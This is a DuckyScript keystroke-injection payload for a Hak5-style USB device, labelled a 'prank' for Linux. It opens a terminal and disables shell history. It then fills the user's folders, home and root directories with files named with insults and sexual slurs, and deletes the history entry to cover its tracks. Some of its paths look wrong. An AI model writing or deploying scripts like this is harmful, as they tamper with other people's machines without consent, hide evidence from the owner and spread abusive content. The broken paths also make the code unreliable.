REM Title: File bomb word list tux style REM Author: FalsePhilosopher REM Target: Unix-like tested on kubuntu 22.04 REM Props: Hak5, strippers and memes REM Version: 1.0 REM Category: Prank REM changes to all the main dir's in home, then home, then root and creates negative named files in each REM REM initialization delay DELAY 300 REM Minimize all windows as that ensures launch happens smoother. WINDOWS d DELAY 300 CTRL-ALT t REM adjust delay as needed DELAY 1500 REM sneak +1 don't delete the whole history or mess with size settings, just turn history off and delete the history change entry ;) STRING set +o history DELAY 200 ENTER DELAY 200 REM STRING nohup cd /Home/Pictures && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Documents && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Music && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Videos && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd /Home/Desktop && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick >/dev/null && cd .. && touch 2-faced stupid jerk dunce dipstick dork bonehead dingbat jackass mouth-breather dumb ugly fat whore slut fuck-stick && history | grep history && line=$(history | grep history | awk '{ print $1 }') && history -d $line && set -o history & DELAY 500 ENTER DELAY 300 ALT F4